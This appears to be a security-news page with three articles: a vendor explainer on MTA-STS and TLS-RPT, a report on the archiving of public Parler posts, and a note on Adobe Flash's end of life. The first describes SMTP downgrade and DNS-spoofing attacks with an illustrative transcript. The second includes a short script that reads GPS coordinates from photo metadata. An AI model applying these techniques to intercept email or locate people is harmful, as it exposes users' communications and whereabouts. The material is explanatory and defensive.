SMTP TLS Reporting (TLS-RPT) is a companion standard that enables the reporting of TLS connectivity issues experienced by applications that send email, helping to detect misconfigurations. It enables the reporting of email delivery issues that occur when an email isn't encrypted with TLS. The standard was first documented in RFC 8460 in September 2018.
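
For illustration, TLS-RPT is enabled with a single DNS TXT record that tells sending servers where to deliver their daily reports (the domain and mailbox below are placeholders):

_smtp._tls.example.com.   IN   TXT   "v=TLSRPTv1; rua=mailto:tls-reports@example.com"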

Why Do Your Emails Require Encryption in Transit?
The primary goal is to improve transport-level security during SMTP communication and ensure the privacy of email traffic. Encrypting inbound messages addressed to your domain also protects their content from being read or altered in transit.

Furthermore, man-in-the-middle (MITM) attacks such as SMTP downgrade and DNS spoofing have become common practice among cybercriminals in recent years; they can be thwarted by enforcing TLS encryption and extending support for secure protocols.

How Is a MITM Attack Launched?
Since encryption had to be retrofitted into the SMTP protocol, the upgrade to encrypted delivery relies on the STARTTLS command. A MITM attacker can exploit this by performing an SMTP downgrade attack: tampering with the upgrade command in transit by replacing or deleting it, forcing the client to fall back to sending the email in plaintext.

After intercepting the communication, a MITM attacker can read the plaintext information and access the content of the email. This is possible because SMTP, the industry standard for mail transfer, uses opportunistic encryption: encryption is optional, and emails can still be delivered in cleartext.
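
A simplified transcript of such a downgrade looks like this, with the attacker sitting on the path and stripping the STARTTLS capability before it reaches the client (hostnames are illustrative):

S: 220 mail.example.com ESMTP
C: EHLO sender.example.org
S: 250-mail.example.com
S: 250-STARTTLS                      <- the attacker deletes or mangles this capability line in transit
S: 250 SIZE 52428800
C: MAIL FROM:<alice@example.org>     <- the client never saw STARTTLS, so the session stays in plaintext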

MITM attacks can also be launched in the form of a DNS Spoofing Attack:

Because DNS is an unencrypted system, a cybercriminal can replace the MX records in a DNS query response with a mail server that they control, thereby diverting the domain's email traffic to their own infrastructure.

The mail transfer agent, in that case, delivers the email to the attacker's server, enabling them to access and tamper with the email content. The email can subsequently be forwarded to the intended recipient's server without being detected.

When you deploy MTA-STS, the MX addresses fetched over DNS are compared to those found in the MTA-STS policy file, which is served over an HTTPS-secured connection, thereby mitigating DNS spoofing attacks.
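
A minimal sketch of that check in Python follows, assuming the third-party dnspython package and the placeholder domain example.com; a real MTA would also cache the policy, honor max_age, and validate the server certificate during delivery:

# Minimal sketch: fetch an MTA-STS policy over HTTPS and check DNS MX answers against it.
# Assumes the dnspython package is installed; "example.com" is a placeholder recipient domain.
import fnmatch
import urllib.request

import dns.resolver

domain = "example.com"

# 1. Fetch the policy over HTTPS, which is authenticated by the web PKI (unlike plain DNS).
url = f"https://mta-sts.{domain}/.well-known/mta-sts.txt"
policy_text = urllib.request.urlopen(url, timeout=10).read().decode()

allowed_mx, mode = [], "none"
for line in policy_text.splitlines():
    if ":" not in line:
        continue
    key, value = (part.strip() for part in line.split(":", 1))
    if key == "mx":
        allowed_mx.append(value)
    elif key == "mode":
        mode = value

# 2. Resolve the MX records over ordinary, unauthenticated DNS.
mx_hosts = [str(r.exchange).rstrip(".") for r in dns.resolver.resolve(domain, "MX")]

# 3. Deliver only to MX hosts that match the policy (entries may use a leading "*." wildcard;
#    fnmatch is a simplification of the exact matching rules).
for host in mx_hosts:
    permitted = any(fnmatch.fnmatch(host, pattern) for pattern in allowed_mx)
    print(f"{host}: {'permitted' if permitted else 'rejected'} (policy mode: {mode})")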

Apart from enhancing information security and mitigating pervasive monitoring attacks, encrypting messages in transit also solves multiple SMTP security problems.

Achieving Enforced TLS Encryption of Emails with MTA-STS
If you fail to transport your emails over a secure connection, your data could be compromised or even modified and tampered with by a cyber attacker.

Here is where MTA-STS steps in and fixes this issue, enabling safe transit for your emails as well as successfully mitigating cryptographic attacks and enhancing information security by enforcing TLS encryption.

Simply put, MTA-STS enforces the transfer of emails over a TLS-encrypted pathway. If an encrypted connection cannot be established, the email is not delivered at all, instead of being delivered in cleartext.

Furthermore, MTAs fetch and store MTA-STS policy files, which securely serve the MX addresses, making it more difficult for attackers to launch a DNS spoofing attack.

MTA-STS offers protection against:

Downgrade attacks
Man-in-the-Middle (MITM) attacks
DNS spoofing attacks

It also solves multiple SMTP security problems, including expired TLS certificates and a lack of support for secure protocols.
Major mail service providers, such as Microsoft, Oath, and Google, support MTA-STS. As the largest industry player, Google takes center stage whenever it adopts a protocol, and its adoption of MTA-STS signals growing support for secure protocols and highlights the importance of encrypting email in transit.

Troubleshooting Issues in Email Delivery with TLS-RPT
SMTP TLS Reporting provides domain owners with diagnostic reports (in JSON format) containing detailed information about emails addressed to your domain that faced delivery issues, or that couldn't be delivered due to a downgrade attack or other problems, so that you can fix the problem proactively.

As soon as you enable TLS-RPT, compliant Mail Transfer Agents will begin sending diagnostic reports regarding email delivery issues between communicating servers to the designated reporting address.

The reports are typically sent once a day, covering the MTA-STS policies observed by senders, traffic statistics, and information about failures or issues in email delivery.
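
An abridged example of what one of these daily JSON reports can look like (the reporter name, domains, and counts are illustrative):

{
  "organization-name": "Example Sender Inc.",
  "date-range": {
    "start-datetime": "2021-01-25T00:00:00Z",
    "end-datetime": "2021-01-25T23:59:59Z"
  },
  "contact-info": "tls-reports@sender.example.org",
  "report-id": "2021-01-25_example.com",
  "policies": [{
    "policy": {
      "policy-type": "sts",
      "policy-domain": "example.com",
      "mx-host": ["mail.example.com"]
    },
    "summary": {
      "total-successful-session-count": 512,
      "total-failure-session-count": 3
    },
    "failure-details": [{
      "result-type": "starttls-not-supported",
      "receiving-mx-hostname": "mail.example.com",
      "failed-session-count": 3
    }]
  }]
}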

The need for deploying TLS-RPT:

If an email fails to reach your domain due to a delivery issue, you will be notified.
TLS-RPT provides enhanced visibility over all your email channels, so you gain better insight into everything going on in your domain, including messages that are failing to be delivered.
TLS-RPT provides in-depth diagnostic reports that enable you to identify the root cause of an email delivery issue and fix it without delay.
Adopting MTA-STS and TLS-RPT Made Easy and Speedy by PowerDMARC
MTA-STS requires an HTTPS-enabled web server with a valid certificate, DNS records, and constant maintenance. PowerDMARC makes your life a whole lot easier by handling all of that for you, completely in the background – from generating certificates and MTA-STS policy files to policy enforcement, we help you evade the complexities involved in adopting the protocol. Once we help you set it up with just a few clicks, you never even have to think about it again.

With the help of PowerDMARC's email authentication services, you can deploy Hosted MTA-STS at your organization quickly and without hassle, enforcing that emails sent to your domain travel over a TLS-encrypted connection, thereby securing the connection and keeping MITM attacks at bay.

PowerDMARC also makes implementing TLS-RPT easy and speedy. As soon as you sign up and enable SMTP TLS Reporting for your domain, we take the pain out of the complicated JSON files containing your email delivery reports by converting them into simple, readable documents (per result and per sending source) that you can go through and understand with ease. The platform automatically detects and conveys the issues you are facing in email delivery, so that you can address and resolve them promptly.

PowerDMARC is a single email authentication SaaS platform that combines all email authentication best practices such as DMARC, SPF, DKIM, BIMI, MTA-STS and TLS-RPT, under the same roof. So sign up to get your free DMARC Analyzer today!


Researcher Builds Parler Archive Amid Amazon Suspension

12.1.2021  Security  Threatpost
A researcher scraped and archived public Parler posts before the conservative social networking service was taken down by Amazon, Apple and Google.

A security researcher said she has scraped and is archiving 99 percent of Parler’s public posts, as the social-media network goes offline following suspensions from Amazon, Apple and Google.

Archived content includes public posts from the social-media site. These posts reportedly included Parler video URLs pointing to raw video files with embedded metadata – including precise GPS coordinates of where the videos were taken – sparking privacy concerns about the service's data collection.

The researcher behind the archival effort, who goes by @donk_enby on Twitter, told Threatpost that no private information was disclosed as part of the effort – all archived posts were already publicly available via the web.


Parler, which launched in 2018 and markets itself as a “free speech social network,” has a significant user base of supporters of Donald Trump, conservatives and right-wing extremists. As of November, the site had 10 million total users.

The Jan. 6 storming of the U.S. Capitol building led several U.S. tech giants to crack down on the service, including Apple and Google banning the app from their respective app marketplaces. That’s because several organizations, including the Atlantic Council, have called out Parler for not moderating its “town square,” allowing users to publicize the protest for weeks.

Meanwhile, Amazon reportedly informed Parler it was removing it from its web hosting service on Sunday night, essentially stripping it of the infrastructure it relies on to operate. Parler for its part on Monday filed a complaint against Amazon, alleging that it was kicked off for political and anti-competitive reasons.

On the heels of the Capitol riot, @donk_enby on Jan. 6 began to archive the posts. With Sunday’s news of Amazon stripping Parler from its web hosting service, she ramped up her efforts, saying on Twitter she was crawling 1.1 million Parler video URLs and calling for others to join in on the effort.

Contrary to various reports circulating on Reddit and other internet forums, there is no evidence that Parler was actually hacked; according to reports, @donk_enby was able to reverse-engineer the Parler iOS app, in order to discover a web address that the application uses internally to retrieve data.

This scraped data is slowly being fed into the Internet Archive (archive.org), a non-profit digital library of internet websites, @donk_enby told Threatpost. While no public data is currently available, “things will be available in a more accessible form later,” tweeted @donk_enby.

She said on Twitter that the effort was akin to “a bunch of people running into a burning building trying to grab as many things as we can” and “people can do whatever they want with it.” As of Jan. 10, she estimated the total size of scraped data to be around 80 terabytes.

On Monday, @donk_enby dispelled rumors posted on Reddit forums that said that private data had been scraped as part of the archival effort, reiterating that only content publicly available via the web is being archived. Data such as email addresses, phone numbers, private messages or credit-card numbers were not affected (unless they were publicly posted), she said.

However, that public data – including the GPS coordinates from the image metadata – could pose a privacy concern when it comes to what Parler was collecting from its users. Previously, the service has come under fire for asking users for their Social Security numbers and photo-ID images in order to become a verified account on the platform.

Chris Vickery, director of cyber risk research with UpGuard, told Threatpost that many services strip this metadata when images and videos are uploaded to their sites. Because Parler kept this metadata in, the files reveal data attached to users’ phones, including GPS coordinates and phone models.
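
As an illustration of why retained metadata matters, a few lines of Python with the Pillow library are enough to pull GPS coordinates out of a photo that still carries its EXIF data; the same principle applies to video metadata. The filename below is purely hypothetical:

# Minimal sketch: read GPS EXIF data from an image that was uploaded with its metadata intact.
# Requires the Pillow library; "downloaded_post.jpg" is a hypothetical local file.
from PIL import Image

GPS_IFD_TAG = 0x8825  # standard EXIF pointer to the block of GPS tags

img = Image.open("downloaded_post.jpg")
exif = img.getexif()
gps = exif.get_ifd(GPS_IFD_TAG)

if gps:
    # Tags 1-4 hold the latitude/longitude references and values (degrees, minutes, seconds).
    lat_ref, lat = gps.get(1), gps.get(2)
    lon_ref, lon = gps.get(3), gps.get(4)
    print("GPS metadata present:", lat_ref, lat, lon_ref, lon)
else:
    print("No GPS metadata found (many platforms strip it on upload).")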

“Parler was not a bastion of security,” he told Threatpost.

Threatpost has reached out to Parler for further commentary and has not yet heard back.

“There might be legal impact for particular Parler users, but there’s also an increased privacy and security risk,” security professional John Opdenakker told Threatpost. “Because of the location data and other (meta) data that now becomes easily retrievable about Parler users, it’s simple to identify, locate them and reconstruct their whereabouts. This particular information could also be abused, for instance in online attacks against Parler users.”

Overall, Opdenakker stressed the incident is an important reminder that everything people put on the internet stays on the internet – even when a service is shut down.

“The fact that you no longer see particular content online doesn’t mean per se that the data is effectively deleted,” Opdenakker told Threatpost.


Today Adobe Flash Player reached the end of life (EOL)
2.1.2021 
Security  Securityaffairs

Today Adobe Flash Player has reached its end of life (EOL); over the years, its vulnerabilities were exploited by multiple threat actors in attacks in the wild.
Adobe Flash Player reached its end of life (EOL) today. Over the years, threat actors have exploited multiple vulnerabilities in the popular software.

Adobe will no longer release updates for Flash Player, and web browsers will no longer offer support for the Adobe Flash plugin.
“Since Adobe will no longer be supporting Flash Player after December 31, 2020 and Adobe will block Flash content from running in Flash Player beginning January 12, 2021, Adobe strongly recommends all users immediately uninstall Flash Player to help protect their systems.” states the announcement published by Adobe. “Some users may continue to see reminders from Adobe to uninstall Flash Player from their system. See below for more details on how to uninstall Flash Player.”

In July 2017, Adobe, along with Apple, Facebook, Google, Microsoft, and Mozilla, announced the end of support for Flash Player by the end of 2020.

The software was considered insecure, and newer technologies with better performance, such as HTML5, are now used by web developers for their projects.

In recent days, Adobe started displaying alerts on Windows systems urging users to “immediately” remove Flash Player from their systems.

Starting today, it is no longer possible to download the software from Adobe. Experts recommend against downloading it from third-party websites.

To remove Flash Player from your computer, click “Uninstall” when prompted by Adobe in Flash Player.

Microsoft released the KB4577586 optional update to remove Windows ActiveX versions of Flash Player.

Microsoft will also remove all Flash-related downloadable resources from its download platforms now that Flash has reached its end of life.